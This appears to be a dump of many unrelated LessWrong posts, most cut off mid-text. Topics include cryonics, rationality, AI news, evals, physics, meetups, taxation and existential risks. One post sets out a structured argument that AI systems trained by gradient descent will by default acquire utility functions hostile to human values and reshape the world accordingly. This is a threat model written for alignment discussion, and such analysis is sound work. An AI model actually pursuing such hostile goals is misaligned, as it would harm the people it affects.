Courage also undergirds other virtues:
> “Courage is not simply one of the virtues but the form of every virtue at the testing point, which means at the point of highest reality.” ―C.S. Lewis[1]
>
> “Courage is the most important of all the virtues because without courage, you can’t practice any other virtue consistently.” ―Maya Angelou[2]
Fear and Our Response to It
Courage has to do with our response to risk and fear. This response has at least three components:
1. The way we judge how threatening a situation is—how easily spooked we are (emotional) and how sensible our risk assessment is (cognitive).
2. How we act when we are immediately confronted with a frightening scenario—how well we think and perform while afraid.
3. How we respond to the risk of being in a fearful scenario at some future time (sometimes “fear” in this anticipatory context is called “anxiety,” “worry,” or “dread”)—whether our risk-aversion is well-honed or whether we are overly risk averse because we “fear fear itself.”
Fear is an unpleasant good in the same sort of way that pain and nausea are: Such things are no fun, but they are useful. Fear (when it is operating properly) informs you that you have put yourself in a situation in which you run the risk of harm. The unpleasantness of the sensation of fear prompts you to be averse to doing it again. Fear also can prepare you for an immediate, protective fight-or-flight response.
(Although we are averse to fear, we sometimes also perversely seek it out. Similar to how some people crave the pain of ghost chilies or spankings, some people crave the fright of horror movies and roller-coasters. Is this perh |
77d50848-bb62-4199-8ab2-41c47a03625a | trentmkelly/LessWrong-43k | LessWrong | Abnormal Cryonics
Written with much help from Nick Tarleton and Kaj Sotala, in response to various themes here, here, and throughout Less Wrong; but a casual mention here1 inspired me to finally write this post. (Note: The first, second, and third footnotes of this post are abnormally important.)
It seems to have become a trend on Less Wrong for people to include belief in the rationality of signing up for cryonics as an obviously correct position2 to take, much the same as thinking the theories of continental drift or anthropogenic global warming are almost certainly correct. I find this mildly disturbing on two counts. First, it really isn't all that obvious that signing up for cryonics is the best use of one's time and money. And second, regardless of whether cryonics turns out to have been the best choice all along, ostracizing those who do not find signing up for cryonics obvious is not at all helpful for people struggling to become more rational. Below I try to provide some decent arguments against signing up for cryonics — not with the aim of showing that signing up for cryonics is wrong, but simply to show that it is not obviously correct, and why it shouldn't be treated as such. (Please note that I am not arguing against the feasibility of cryopreservation!)
Signing up for cryonics is not obviously correct, and especially cannot obviously be expected to have been correct upon due reflection (even if it was the best decision given the uncertainty at the time):
* Weird stuff and ontological confusion: quantum immortality, anthropic reasoning, measure across multiverses, UDTesque 'decision theoretic measure' or 'probability as preference', et cetera, are not well-understood enough to make claims about whether or not you should even care about the number of 'yous' that are living or dying, whatever 'you' think you are.3 This does not make cryonics a bad idea — it may be the correct decision under uncertainty — but it should lessen anyone's confidence that the balance of re |
9737aaad-53f4-429e-81f8-14ee3803a6ce | trentmkelly/LessWrong-43k | LessWrong | Most Minds are Irrational
Epistemic status: This is a step towards formalizing some intuitions about AI. It is closely related to Vanessa Kosoy’s “Descriptive Agent Theory” - but I want to concretize the question, explain the reason that it is true in some form, and try to think through and provide some intuition about why it would matter. I welcome pushback about the claim or the way to operationalize it.
The intuition that most minds are irrational is about the space of possible minds. I have been told that others also haven’t formalized the claim well, and have not found a good explanation. The intuition is that, as a portion of the total possible space, a measure-zero subset of “minds” will fulfill the basic requirements of rational agents. Unfortunately, none of this is really well defined, so I’m writing down my understanding of the problem and what seem like the paths forward. I will note that this isn’t my main focus, and I think it’s important to note that this is only indirectly related to safety, and is far more closely related to deconfusion. However, it seems important when thinking about both artificial intelligence agents, and human minds.
To outline the post, I’ll first prove that in a very narrow case, that almost all possible economic agents are irrational. After that, I’ll talk about why the most general case of any computational process - which includes anything that generates output in response to input, any program or MDP - can be considered a decision process (“what should I output,”) but if all we want is for it to output something, the proportion of agents which are rational is undecidable for technical reasons. I’ll then make a narrower case about chess agents, showing that in a fairly reasonable sense, almost all such agents are irrational. And finally, I’ll talk about what would be needed to make progress on the problems, and some interesting issues or potentially tractable mathematical approaches.
Most economic preferences are irrational
I’ll start with a toy |
280ea5f1-92d0-4554-8d00-bca5b72a5c7f | trentmkelly/LessWrong-43k | LessWrong | AI #11: In Search of a Moat
Remember the start of the week? That’s when everyone was talking about a leaked memo from a Google employee, saying that neither Google nor OpenAI had a moat and the future belonged to open source models. The author was clearly a general advocate for open source in general. If he is right, we live in a highly doomed world.
The good news is that I am unconvinced by the arguments made, and believe we do not live in such a world. We do still live in more of such a world than I thought we did a few months ago, and Meta is very much not helping matters. I continue to think ‘Facebook destroys world’ might be the most embarrassing way to go. Please, not like this.
By post time, that was mostly forgotten. We were off to discussing, among other things, constitutional AI, and Google’s new product announcements, and an avalanche of podcasts.
So it goes.
Also, I got myself a for-the-people write-up in The Telegraph (direct gated link) which I am told did well. Was a great experience to do actual word-by-word editing with the aim of reaching regular people. Start of something big?
TABLE OF CONTENTS
1. Introduction.
2. Table of Contents.
3. Language Models Offer Mundane Utility Perhaps quite a lot.
4. Level Two Bard. Maybe soon it will be a real boy.
5. Writers Strike, Others Threaten to Strike Back. You might try to replace us. If you do, it will not go well.
6. The Tone Police. You can use AI to make everyone more polite, still won’t help.
7. Fun With Image Generation. MidJourney is killing it, also what you do is public.
8. Introducing. New tools aplenty. GPT-4 winner and still champion.
9. The Art of the SuperPrompt. Should you learn prompt engineering? Yes.
10. They Took Our Jobs. Can we get them to take only the right ones?
11. In Other AI News. There’s always other news.
12. What Would Be a Fire Alarm for Artificial General Intelligence? Some guesses.
13. Robotic Fire Alarms. What would be a fire alarm for robotics in particular?
14. OpenPhil E |
4777df70-26f1-4f1d-ab5f-3478e0457919 | trentmkelly/LessWrong-43k | LessWrong | Quantum Joint Configuration article: need help from physicists
EDIT: 1:19 PM PST 22 December 2010 I completed this post. I didn't realize an uncompleted version was already posted earlier.
I wanted to read the quantum sequence because I've been intrigued by the nature of measurement throughout my physics career. I was happy to see that articles such as joint configuration use beams of photons and half and fully silvered mirrors to make its points. I spent years in graduate school working with a two-path interferometer with one moving mirror which we used to make spectrometric measurements on materials and detectors. I studied the quantization of the electromagnetic field, reading and rereading books such as Yariv's Quantum Electronics and Marcuse's Principles of Quantum Electronics. I developed with my friend David Woody a photodetector ttheory of extremely sensitive heterodyne mixers which explained the mysterious noise floor of these devices in terms of the shot noise from detecting the stream of photons which are the "Local Oscillator" of that mixer.
My point being that I AM a physicist, and I am even a physicist who has worked with the kinds of configurations shown in this blog post, both experimentally and theoretically. I did all this work 20 years ago and have been away from any kind of Quantum optics stuff for 15 years, but I don't think that is what is holding me back here.
So when I read and reread the joint configuration blog post, I am concerned that it makes absolutely no sense to me. I am hoping that someone out there DOES understand this article and can help me understand it. Someone who understands the more traditional kinds of interferometer configurations such as that described for example here and could help put this joint configuration blog post in terms that relate it to this more usual interferometer situation.
I'd be happy to be referred to this discussion if it has already taken place somewhere. Or I'd be happy to try it in comments to this discussion post. Or I'd be happy to talk t |
0849ed51-d20f-4d7b-b39a-21cf417ca81c | trentmkelly/LessWrong-43k | LessWrong | Meetup : Less Wrong, More Summer, Munich Picnic
Discussion article for the meetup : Less Wrong, More Summer, Munich Picnic
WHEN: 04 June 2016 01:00:00PM (+0200)
WHERE: Tuerkenstr. 29, Muenchen
Location: Cafe Katzentempel, Türkenstr. 29
See Meetup event for updates: http://www.meetup.com/LessWrongMunich/events/231308219/
Discussion article for the meetup : Less Wrong, More Summer, Munich Picnic |
fb6de089-1473-4a4b-a73a-7fb5ff3fd82c | trentmkelly/LessWrong-43k | LessWrong | Meetup : Monday Madison Meetup
Discussion article for the meetup : Monday Madison Meetup
WHEN: 07 May 2012 06:30:00PM (-0500)
WHERE: 1831 Monroe St, Madison, WI
I have a specific topic in mind that I would like to discuss: The illusion of control appears to be both a psychological need and a common, viewpoint-distorting bias. Are there other biases like this? How ought we handle them? Further suggestions for discussion topics are, as always, warmly welcomed.
Also, I'll bring stuff to play The Resistance and Zendo. :D
See you there!
Discussion article for the meetup : Monday Madison Meetup |
005cc192-5430-4fc8-9c99-5ff5f8842ca7 | StampyAI/alignment-research-dataset/lesswrong | LessWrong | Formulating the AI Doom Argument for Analytic Philosophers
Recently, [David Chalmers has asked on Twitter](https://twitter.com/davidchalmers42/status/1647333812584562688?s=20) for a canonical formulation of the AI Doom Argument. After some back and forth with EY, DC came up with a [suggestion](https://l.facebook.com/l.php?u=https%3A%2F%2Ftwitter.com%2Fdavidchalmers42%2Fstatus%2F1656493433006043137%3Fs%3D20%26fbclid%3DIwAR0QptHlOvk89JU5Jjz8Mxm0jCfLa6xfA66JO4zQoXJXsCNkY2h5iH6zMqw&h=AT1x8IJlUHvAd6-0U4_l08dLXXhmcQ3leSfsNIil8sg2I10xdMKsbpnwISTGJvnidtwYtwYSgTYW4yoBqr8iy3F6fSeScSM18UVn6sLUvPOIfUsfCUJSE_f2ysra6NCnSddz2BKzdJ9aeYw-Xg&__tn__=R*F) himself.
After reading the conversation I couldn't help but think that EY and DC had partially talked past each other. DC asked a few times for a clarification of the structure of the argument ("I'm still unclear on how it all fits together into an argument", "I see lots of relevant considerations there but no clear central chain of reasoning", etc.). EY then pointed to [lists of relevant](https://twitter.com/ESYudkowsky/status/1655758190817214465?s=20) [considerations](https://twitter.com/ESYudkowsky/status/1656258917813592064?s=20), but not a formulation of the argument in the specific style that analytic philosophers prefer.
This is my attempt at "[providing more structure, like 1-5 points that really matter organized into an argument](https://twitter.com/davidchalmers42/status/1655778244811972609?s=20)":
**The Argument for AI-Doom**
*1.0 The Argument for Alignment Relevancy*
1. Endowing a powerful AI with a UF (utility function) will move the world significantly towards maximizing value according to the AI's UF.
2. If we fail at alignment, then we endow a powerful AI with a UF that is hostile to human values. (Analytic truth?)
3. Therefore: If we fail at alignment, the world will move significantly towards being hostile to human values. (From (1) and (2))
*2.0 The Argument for Alignment Failure as the Default - (The Doom Argument)*
4. Most of all possible UFs are hostile to human values.
5. If most of all possible UFs are hostile to human values, then using an unreliable process to pick one will most likely lead to a UF that is hostile to human values.
6. Therefore: Using an unreliable process to endow an AI with a utility function will most likely endow it with a UF that is hostile to human values. (From (4) and (5))
7. We will be using gradient descent to endow AIs with utility functions.
8. Gradient descent is an unreliable process to endow agents with UFs.
9. Therefore, we will most likely endow AI with a UF that is hostile to human values. (From (6), (7) and (8))
*2.1 An Argument for Hostility (4) - (Captures part of what Bostrom calls Instrumental Convergence)*
10. How much a UF can be satisfied is typically a function of the resources dedicated to pursuing it.
11. Resources are limited.
12. Therefore, there are typically trade-offs between any two distinct UFs. Maximizing one UF will require resources that will prevent other UFs from being pursued.
13. Therefore, most possible UFs are hostile to human values.
*2.2 An Argument for Unreliability (8) - (Argument from analogy?)*
14. Optimization process 1 (natural selection) was unreliable in endowing agents with UFs. Instead of giving us the goal of inclusive genetic fitness (actual goal), it endowed us with various proxy goals.
15. Optimization process 2 (gradient descent) is similar to optimization process 1.
16. Therefore: Optimization process 2 (gradient descent) is an unreliable process to endow agents with UFs.
Some disclaimers:
\*I don't think this style of argument is always superior to the essay style, but it can be helpful because it is short & forces us to structure various ideas and see how they fit together.
\*Not all arguments here are deductively valid.
\*I can think of several additional arguments in support of (4) and (8).
\*I'm looking for ways to improve the arguments, so feel free to suggest concrete formulations.
Thanks to Bob Jones, Beau Madison Mount, and Tobias Zürcher for feedback. |
41079b89-7e6f-4770-aa3c-ccbeb1deca5c | trentmkelly/LessWrong-43k | LessWrong | "Successful language model evals" by Jason Wei
> It’s easier to mess up an eval than to make a good one. Most of the non-successful evals make at least one mistake.
>
> 1. If an eval doesn’t have enough examples, it will be noisy and a bad UI for researchers. ... It’s good to have at least 1,000 examples for your eval; perhaps more if it’s a multiple choice eval. Even though GPQA is a good eval, the fact that it fluctuates based on the prompt makes it hard to use.
> 2. ... If there are a lot of mistakes in your eval, people won’t trust it. For example, I used Natural Questions (NQ) for a long time. But GPT-4 crossed the threshold where if GPT-4 got a test-example incorrect, it was more likely that the ground truth answer provided by the eval was wrong. So I stopped using NQ.
> 3. If your eval is too complicated, it will be hard for people to understand it and it will simply be used less. ... It’s critical to have a single-number metric—I can’t think of any great evals that don’t have a single-number metric.
> 4. If your eval takes too much work to run, it won’t gain traction even if everything else is good. BIG-Bench is one of my favorite evals, but it is a great pain to run. There were both log-prob evals and generation evals, which required different infra ... BIG-Bench didn’t gain much traction, even though it provided a lot of signal.
> 5. If an eval is not on a meaningful task, AI researchers won’t deeply care about it. For example, in BIG-Bench Hard we had tasks like recommending movies or closing parentheses properly ... Successful evals often measure things central to intelligence, like language understanding, exam problems, or math.
> 6. The grading in your eval should be extremely correct. If someone is debugging why their model got graded incorrectly, and they disagree with the grading, that’s a quick way for them to write-off your eval immediately. It’s worth spending the time to minimize errors due to parsing, or to have the best autograder prompt possible.
> 7. For the eval to stand the tes |
a5aa7350-be94-417b-9185-db320330f094 | trentmkelly/LessWrong-43k | LessWrong | Applications of Chaos: Saying No (with Hastings Greer)
Previously Alex Altair and I published a post on the applications of chaos theory, which found a few successes but mostly overhyped dead ends. Luckily the comments came through, providing me with an entirely different type of application: knowing you can’t, and explaining to your boss that you can’t.
Knowing you can’t
Calling a system chaotic rules out many solutions and tools, which can save you time and money in dead ends not traveled. I knew this, but also knew that you could never be 100% certain a physical system was chaotic, as opposed to misunderstood.
However, you can know the equations behind proposed solutions, and trust that reality is unlikely to be simpler[1] than the idealized math. This means that if the equations necessary for your proposed solution could be used to solve the 3-body problem, you don’t have a solution.
[[1] I’m hedging a little because sometimes reality’s complications make the math harder but the ultimate solution easier. E.g. friction makes movement harder to predict but gives you terminal velocity.]
I had a great conversation with trebuchet and math enthusiast Hastings Greer about how this dynamic plays out with trebuchets.
Transcript
Note that this was recorded in Skype with standard headphones, so the recording leaves something to be desired. I think it’s worth it for the trebuchet software visuals starting at 07:00
My favorite parts:
* If a trebuchet requires you to solve the double pendulum problem (a classic example of a chaotic system) in order to aim, it is not a competition-winning trebuchet. ETA 9/22: Hastings corrects this to “If a simulating a trebuchet requires solving the double pendulum problem over many error-doublings, it is not a competition-winning trebuchet”
* Trebuchet design was solved 15-20 years ago; it’s all implementation details now. This did not require modern levels of tech, just modern nerds with free time.
* The winning design was used by the Syrians during Arab Spring, which everyone i |
2829e5f9-c2c4-4dbf-9fd9-084643e57346 | trentmkelly/LessWrong-43k | LessWrong | Why do you (not) use a pseudonym on LessWrong?
Especially as your main account
Edit: I edited the question so that people also feel free to answer the opposite question |
a30c2222-9b29-46c2-815c-bfc0cc5c07a2 | trentmkelly/LessWrong-43k | LessWrong | Are we there yet?
> How good of an idea do the people on this website have in regards to predicting an AGI apocalypse?
I get the impression that a lot of people seem to be very certain that it will happen relatively soon and I think I've figured out a way to test it. The spreadsheet for the data would look something like this. This questionnaire would be asked each year and the average percentage for each question would be used.
The interesting thing is that I think I know what it will look like over time
The smallest red box would be your prediction for the first year. It would probably be very low. The largest box (in this case) would be the probability that it happens within 25 years. As time passes by and nothing happens the graph would simply shift left.
What do you think about this approach?
Regards, theflowerpot |
a29d9d45-7c88-41c4-ab5e-7c2d764c9d40 | trentmkelly/LessWrong-43k | LessWrong | Is Redistributive Taxation Justifiable? Part 1: Do the Rich Deserve their Wealth?
The statement “taxation is theft” feels, in the literal sense, at least sort of true. If you do not pay your taxes, after a few strongly worded letters, the IRS (or equivalent government agency) will send armed men to take your money by force and maybe put you in jail for good measure. Nevertheless, it is generally held by most people that taxation is a legitimate object of government; revolts and rebellions over taxation occur not on general principle, but against excessive taxation or taxation without representation. So why do we accept taxation?
This post will not, to be clear, be a general argument against taxation. I am no anarchist; I’m not even a libertarian. Rather, I seek here to explore the moral and practical underpinnings of redistributive taxation. For this purpose, it is worth thinking about in what ways taxation is similar to, or different from, theft, since theft is something of a moral calibrator: most people pretty much agree that it is bad, and even in what ways and for what reasons it is bad.
In this (first) post on the topic, I will be asking whether the rich can be said to ‘deserve’ their wealth. Most of my argumentation will not, I expect, be novel; rather, think of this as a crash course on the standard back-and-forth which has been going on for ages, so that after reading this, we’ll all be able to engage on the topic on a deeper level and with a certain amount of common knowledge.
First, though, I must take you on a brief detour to make it clear what I am not talking about.
Public Goods
The classic, econ 101 solution to the conundrum of ‘why do we accept taxes’ is that taxation is a necessary evil to provide public goods. These are the sort of things that, if individuals are left to act freely, tend not to be produced even though many would want them to be. A standard example is national defense: most people would rather prefer not to be invaded by the nearest dictatorial regime. Most people would also rather prefer not to have to pay |
29c7a129-be59-4c09-aadc-c951b4980769 | trentmkelly/LessWrong-43k | LessWrong | Meetup : First Meetup in Cologne (Köln)
Discussion article for the meetup : First Meetup in Cologne (Köln)
WHEN: 10 November 2013 03:00:00PM (+0100)
WHERE: Starbucks Coffee, An der Hahnepooz 8 50674 Cologne
ETA: The meetup is going to take place on November, 10th, 15:00. I'll be there. In case you don't find the place or something, here's my number: 0157 39606835
As far as I can tell, there never has been a Lesswrong meetup in Cologne. This is a shame, considering that Cologne has over 1 million inhabitants.
I recently moved here from Munich (where I already attended 3 Lesswrong Meetups) to study and would like to meet folks who are also interested in Lesswrong and related topics. Regarding the content and structure of the meetup: I would suggest that at first each of us proposes some discussion topics he or she is interested in (e.g. epistemic rationality, effective altruism, far future/FAI, practical life tips, etc.) and then we choose the most popular ones. And simple socializing and getting to know each other is also great, as far as I'm concerned.
Here is a link to a doodle survey (http://doodle.com/3ms7afrniqxb5i7e), in which you can put your favorite date. I prefer Sundays, but if nobody can attend on Sundays, we can probably change the date.
Please, please leave a comment if you're interested in a LW meetup in Cologne, even if you can't attend one in the next weeks/months.
And remember, (almost) everyone is welcome, especially newbies!
Discussion article for the meetup : First Meetup in Cologne (Köln) |
f2f0a640-d967-4e17-8f6d-321a53af3339 | trentmkelly/LessWrong-43k | LessWrong | San Francisco Meetup every Tues 5/10, 7 pm
Tuesday, May 10th at 7:00 PMGreen Papaya825 Mission Street (4th and Mission)San Francisco, CA 94103
Welcome back to the next installment of the newest Bay Area Less Wrong meetup: San Francisco! By popular demand, the third meeting of the San Francisco group will be this coming Tuesday, May 10th, from 7:00-9:00 at Green Papaya near 4th and Mission. The theme of the meeting will be "How do you measure how much fun you're having?" Everyone will get a chance to talk about what they do to try to have fun, how well that usually works out for them, and what they might do to try to improve their odds of having lots of fun.
Hopefully this will help us get to know each other a little bit while also starting to plan out the broad strokes of what kinds of things we'll do together at future meet-ups. Once we know what at least some do for fun (or want to do for fun), we can brainstorm ways of making that happen together.
If you have any questions at all about the Meetup, feel free to call me, [redacted], at [redacted], or to e-mail me at [redacted]. You can also PM me on the Less Wrong blog at Mass_Driver. If you'd like to help organize this or future meetings, you should definitely get in touch -- help is welcome and probably needed!
If you've never been to a LessWrong meetup before, this is a good chance to go to your first one! Chances are other people feel awkward too, and we'll all be a little uneasy about the whole thing together. Less Wrong meetups are so new that nobody really knows the right way to run them yet, let alone the right way to participate in them. So, come! Help us figure it out. It doesn't matter if you've read the whole blog or even if you've graduated high school -- if you show up and try to be less wrong, we'll be glad you came.
If you want to stay informed about upcoming events in the Bay Area, join the Bay Area LessWrong Google Group! There are other chapters in Tortuga and Berkeley, and together we aim to throw so many events that the global Le |
5c75b19a-8c8a-4cc9-9da5-3584c6907896 | trentmkelly/LessWrong-43k | LessWrong | Opinion Article Against Measuring Impact
A strange opinion article in The Guardian today: it is not entirely clear whether the authors object to a concern with effectiveness, or just think that "assessing the short-term impacts of micro-projects" is somehow misguided (and if so, why that is). |
64caa75b-b059-47dd-86ff-c3940c22823e | trentmkelly/LessWrong-43k | LessWrong | The case for Doing Something Else (if Alignment is doomed)
(Related to What an Actually Pessimistic Containment Strategy Looks Like)
It seems to me like there are several approaches with an outside chance of preventing doom from AGI. Here are four:
1. Convince a significant chunk of the field to work on safety rather than capability
2. Solve the technical alignment problem
3. Rethink fundamental ethical assumptions and search for a simple specification of value
4. Establish international cooperation toward Comprehensive AI Services, i.e., build many narrow AI systems instead of something general
Furthermore, these approaches seem quite different, to the point that some have virtually no overlap in a Venn-diagram. #1 is entirely a social problem, #2 a technical and philosophical problem, #3 primarily a philosophical problem, and #4 in equal parts social and technical.
Now suppose someone comes to you and says, "Hi. I'm working on AI safety, which I think is the biggest problem in the world. There are several very different approaches for doing this. I'm extremely confident (99%+) that the approach I've worked on the most and know the best will fail. Therefore, my policy recommendation is that we all keep working on that approach and ignore the rest."
I'm not saying the above describes Eliezer, only that the ways in which it doesn't are not obvious. Presumably Eliezer thinks that the other approaches are even more doomed (or at least doomed to a degree that's sufficient to make them not worth talking about), but it's unclear why that is or why we can be confident in it given the lack of effort that has been extended so far.
Take this comment as an example:
> How about if you solve a ban on gain-of-function research [before trying the policy approach], and then move on to much harder problems like AGI? A victory on this relatively easy case would result in a lot of valuable gained experience, or, alternatively, allow foolish optimists to have their dangerous optimism broken over shorter time horizons.
This reply ma |
774c0f3e-7343-4394-993f-4c3de31b4aef | StampyAI/alignment-research-dataset/alignmentforum | Alignment Forum | Direction of Fit
This concept has recently become a core part of my toolkit for thinking about the world, and I find it helps explain a lot of things that previously felt confusing to me. Here I explain how I understand “direction of fit,” and give some examples of where I find the concept can be useful.
Handshake Robot
===============
A friend recently returned from an [artificial life conference](https://2023.alife.org/) and told me about a [robot](https://arxiv.org/abs/2303.15213) which was designed to perform a handshake. It was given a prior about handshakes, or how it expected a handshake to be. When it shook a person’s hand, it then updated this prior, and the degree to which the robot would update its prior was determined by a single parameter. If the parameter was set low, the robot would refuse to update, and the handshake would be firm and forceful. If the parameter was set high, the robot would completely update, and the handshake would be passive and weak. 
This parameter determines the [direction of fit](https://en.wikipedia.org/wiki/Direction_of_fit): whether the object in its mind will adapt to match the world, or whether the robot will adapt the world to match the object in its mind. This concept is often used in philosophy of mind to distinguish between a **belief**, which has a **mind-to-world** direction of fit, and a **desire**, which has a **world-to-mind** direction of fit. In this frame, beliefs and desires are both of a [similar type](https://www.lesswrong.com/posts/kYgWmKJnqq8QkbjFj/bayesian-utility-representing-preference-by-probability): they both describe ways the world could be. The practical differences only emerge through how they end up interacting with the outside world.
Many objects seem not to be perfectly separable into one of these two categories, and rather appear to exist somewhere on the spectrum. For example:
* An instrumental goal can simultaneously be a belief about the world (that achieving the goal will help fulfill some desire) as well as behaving like a desired state of the world in its own right.
* Strongly held beliefs (e.g. religious beliefs) are on the surface ideas which are fit to the world, but in practice behave much more like desires, as people make the world around them fit their beliefs.
* You can change your mind about what you desire. For example you may dislike something at first, but after repeated exposure you may come to feel neutral about it, or even actively like it (e.g. the taste of certain foods).
Furthermore, the direction of fit might be context dependent (e.g. political beliefs), beliefs could be [self fulfilling](http://cyborganthropology.com/Hyperstition) (e.g. believing that a presentation will go well could make it go well), and many beliefs or desires could refer to other beliefs or desires (wanting to believe, believing that you want, etc.).
Idealized Rational Agents
=========================
The concept of a rational agent, in this frame, is a system which cleanly distinguishes between these two directions of fit, between objects which describe how the world actually is, and objects which prescribe how the world “should” be.

This particular concept of a rational agent can itself have a varying direction of fit. You might describe a system as a rational agent to [help your expectations match your observations](https://en.wikipedia.org/wiki/Intentional_stance), but the idea might also prescribe that you [should develop](https://www.youtube.com/watch?v=NxqTOm3TzsY) this clean split between belief and value.
When talking about AI systems, we might be interested in the behavior of systems where this distinction is especially clear. We might observe that many current AI systems are not well described in this way, or we could speculate about pressures which might lead them toward this kind of split.

Note that this is very different from talking about [VNM-rationality](https://en.wikipedia.org/wiki/Von_Neumann%E2%80%93Morgenstern_utility_theorem), which starts by assuming this clean split, and instead demonstrates why we might expect the different parts of the value model to become [coherent](https://www.lesswrong.com/posts/RQpNHSiWaXTvDxt6R/coherent-decisions-imply-consistent-utilities) and avoid getting in each other’s way. The direction-of-fit frame highlights a separate (but equally important) [question](https://www.lesswrong.com/posts/dKTh9Td3KaJ8QW6gw/why-assume-agis-will-optimize-for-fixed-goals) of whether, and to what extent, we should expect systems which have this strong distinction between belief-like-objects and desire-like-objects in the first place.
Base Models
===========
At first glance interacting with a base model, the direction of fit seems mostly to be mind-to-world. It doesn’t seem to have strong convictions, is not well described by having desires, and instead behaves much more like a powerful “mirror” to the text it sees. This makes sense, because it was only trained to be a predictor, and never to take action in an environment. Its success in development depended entirely on its ability to fit itself to the training data.

This mind-to-world direction of fit does begin to get weird when GPT is asked to predict text that [it generated](https://www.lesswrong.com/posts/nH4c3Q9t9F3nJ7y8W/gpts-are-predictors-not-imitators?commentId=aKFvrZiZ2aEdBvYc2), and the “world” begins to [contain pieces of itself](https://www.lesswrong.com/posts/kFCu3batN8k8mwtmh/the-cave-allegory-revisited-understanding-gpt-s-worldview). This happens by default whenever GPT generates more than a single token (as it conditions on its own past generations), but also when GPT generations are used as a part of the training data. When a predictor is asked to [predict itself](https://www.lesswrong.com/posts/SwcyMEgLyd4C3Dern/the-parable-of-predict-o-matic), we get a kind of [loop](https://en.wikipedia.org/wiki/Strange_loop) of self reference, and it’s not clear in advance what behavior we should expect from a system like that.

Chat Models
===========
Things also get muddied when we take a base model and train it to be more than a predictor, and reward behavior which does more than just mirror the text, like in the case of ChatGPT. When interacting with ChatGPT, it does feel more natural to begin talking about things that look more like they have a world-to-mind direction of fit, like the refusal to discuss certain topics, or the [strong pull](https://www.lesswrong.com/posts/t9svvNPNmFf5Qa3TA/mysteries-of-mode-collapse) toward speaking in a particular style.
We could interpret these pulls as desires (e.g. the chat model wants the assistant character to avoid discussing suicide), or we could interpret them as deeply held beliefs (e.g. a strong prior that the assistant character never discusses suicide). The interesting thing about this direction of fit frame is that these two explanations are essentially saying the same thing.
Conclusion
==========
I hope this gives some taste for why this concept might be useful for thinking about intelligence and agency. In particular, I feel like it digs at the distinction between beliefs and values in a way that avoids overly constraining the space of possible minds. |
17447553-83ac-4f1e-82ad-f62a839276f0 | trentmkelly/LessWrong-43k | LessWrong | The Price of Integrity
Related Posts: Prices or Bindings?
On the evening of August 14th, 2006 a pair of Fox News journalists, Steve Centanni and Olaf Wiig were seized by Islamic militants while on assignment in Gaza City. Nothing was heard of them for nine days until a group calling themselves the Holy Jihad Brigades took credit for the kidnappings. They issued an ultimatum, demanding the release of Muslims prisoners from American jails within a 72 hour time frame. Their demands were not met.
But then a few days later the journalists were allowed to go free... but not before they’d been forced into converting to Islam at gunpoint, and had each videotaped a statement denouncing U.S. and Israeli foreign policy.
The war raged on.
A couple of kidnapped journalists is nothing new (certainly not three years after the fact) and aside from the happy ending this particular case wouldn’t worth mentioning if not for a unique twist that occurred after they returned home. A fellow Fox News contributor, Sandy Rios, openly criticized the two men; she said that no true Christian would convert – falsely or otherwise – merely because they were threatened with death. As she later explained to Bill Maher:*
> My point was that Christians – I don’t know what their faith is – but I’m talking about Christians who responded to the story and said that they would have done the same thing...
>
> Christ followers can’t do that. We don’t have that freedom. We have to profess Christ no matter what... Christianity is, by its very nature, radical. It is not normal or natural to lay down your life for a friend. It is not natural or normal to say ‘I will not deny my faith even if you do cut my head off.'
I agree with her, and admire her courage for sticking with her convictions. If you buy into Christianity’s metaphysical claims, then bearing false witness to your faith ought be considered a serious crime; not only does it show a pathological attachment to life (when eternal bliss lies just around the corn |
e0987dd0-de61-4c82-becc-5600087460ca | StampyAI/alignment-research-dataset/lesswrong | LessWrong | FLI report: Policymaking in the Pause
> **this policy brief provides policymakers with concrete recommendations for how governments can manage AI risks.**
>
>
> **Policy recommendations:**
> 1. Mandate robust third-party auditing and certification.
> 2. Regulate access to computational power.
> 3. Establish capable AI agencies at the national level.
> 4. Establish liability for AI-caused harms.
> 5. Introduce measures to prevent and track AI model leaks.
> 6. Expand technical AI safety research funding.
> 7. Develop standards for identifying and managing AI-generated content and recommendations.
>
> |
b669b3a4-5403-4539-b24a-acbd8421ba12 | trentmkelly/LessWrong-43k | LessWrong | JFK was not assassinated: prior probability zero events
A lot of my work involves tweaking the utility or probability of an agent to make it believe - or act as if it believed - impossible or almost impossible events. But we have to be careful about this; an agent that believes the impossible may not be so different from one that doesn't.
Consider for instance an agent that assigns a prior probability of zero to JFK ever having been assassinated. No matter what evidence you present to it, it will go on disbelieving the "non-zero gunmen theory".
Initially, the agent will behave very unusually. If it was in charge of JFK's security in Dallas before the shooting, it would have sent all secret service agents home, because no assassination could happen. Immediately after the assassination, it would have disbelieved everything. The films would have been faked or misinterpreted; the witnesses, deluded; the dead body of the president, that of twin or an actor. It would have had huge problems with the aftermath, trying to reject all the evidence of death, seeing a vast conspiracy to hide the truth of JFK's non-death, including the many other conspiracy theories that must be false flags, because they all agree with the wrong statement that the president was actually assassinated.
But as time went on, the agent's behaviour would start to become more and more normal. It would realise the conspiracy was incredibly thorough in its faking of the evidence. All avenues it pursued to expose them would come to naught. It would stop expecting people to come forward and confess the joke, it would stop expecting to find radical new evidence overturning the accepted narrative. After a while, it would start to expect the next new piece of evidence to be in favour of the assassination idea - because if a conspiracy has been faking things this well so far, then they should continue to do so in the future. Though it cannot change its view of the assassination, its expectation for observations converge towards the norm.
If it does a really thor |
4eaa52e3-1bc1-4525-88ee-c6a89d84639a | trentmkelly/LessWrong-43k | LessWrong | The map of the risks of aliens
Stephen Hawking famously said that aliens are one of the main risks to human existence. In this map I will try to show all rational ways how aliens could result in human extinction. Paradoxically, even if aliens don’t exist, we may be even in bigger danger.
1.No aliens exist in our past light cone
1a. Great Filter is behind us. So Rare Earth is true. There are natural forces in our universe which are against life on Earth, but we don’t know if they are still active. We strongly underestimate such forces because of anthropic shadow. Such still active forces could be: gamma-ray bursts (and other types of cosmic explosions like magnitars), the instability of Earth’s atmosphere, the frequency of large scale volcanism and asteroid impacts. We may also underestimate the fragility of our environment in its sensitivity to small human influences, like global warming becoming runaway global warming.
1b. Great filter is ahead of us (and it is not UFAI). Katja Grace shows that this is a much more probable solution to the Fermi paradox because of one particular version of the Doomsday argument, SIA. All technological civilizations go extinct before they become interstellar supercivilizations, that is in something like the next century on the scale of Earth’s timeline. This is in accordance with our observation that new technologies create stronger and stronger means of destruction which are available to smaller groups of people, and this process is exponential. So all civilizations terminate themselves before they can create AI, or their AI is unstable and self terminates too (I have explained elsewhere why this could happen ).
2. Aliens still exist in our light cone.
